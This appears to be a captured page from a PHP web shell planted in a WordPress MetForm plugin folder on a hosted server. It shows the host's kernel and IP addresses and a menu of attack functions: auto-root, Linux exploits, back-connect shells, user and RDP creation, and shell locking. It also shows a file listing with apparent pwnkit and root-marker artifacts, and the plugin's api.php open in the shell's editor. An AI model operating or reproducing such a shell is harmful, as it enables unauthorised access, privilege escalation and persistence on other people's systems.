Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
metform /
base /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
api.php
1.04
KB
-rw-r--r--
common.php
589
B
-rw-r--r--
cpt.php
390
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcode.php
7.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php namespace MetForm\Base; defined('ABSPATH') || exit; abstract class Api { public $prefix = ''; public $param = ''; public $request = null; public function __construct() { $this->config(); $this->init(); } public abstract function config(); public function init() { add_action('rest_api_init', function () { register_rest_route(untrailingslashit('metform/v1/' . $this->prefix), '/(?P<action>\w+)/' . ltrim($this->param, '/'), array( 'methods' => \WP_REST_Server::ALLMETHODS, 'callback' => [$this, 'action'], 'permission_callback' => '__return_true', )); }); } public function action($request) { $this->request = $request; $action_class = strtolower($this->request->get_method()) . '_' . $this->request['action']; if (method_exists($this, $action_class)) { return $this->{$action_class}(); } } }
Close